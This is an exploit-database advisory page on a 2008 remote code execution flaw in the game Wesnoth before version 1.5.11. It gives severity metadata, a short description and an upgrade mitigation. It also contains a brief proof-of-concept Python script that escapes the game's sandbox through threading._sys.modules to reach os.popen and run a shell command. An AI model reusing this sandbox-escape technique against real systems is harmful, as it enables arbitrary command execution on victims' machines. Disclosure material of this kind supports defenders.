header-logo
Suggest Exploit
vendor:
Wesnoth
by:
SecurityFocus
9.3
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Wesnoth
Affected Version From: Prior to Wesnoth 1.5.11
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Wesnoth Remote Code Execution Vulnerability

Wesnoth is prone to a remote code-execution vulnerability caused by a design error. Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.

Mitigation:

Upgrade to Wesnoth version 1.5.11 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/33971/info

Wesnoth is prone to a remote code-execution vulnerability caused by a design error.

Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.

Versions prior to Wesnoth 1.5.11 are affected.

#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.example.com'")
f.close()

Navigation

Suggest Exploit

Services By CQR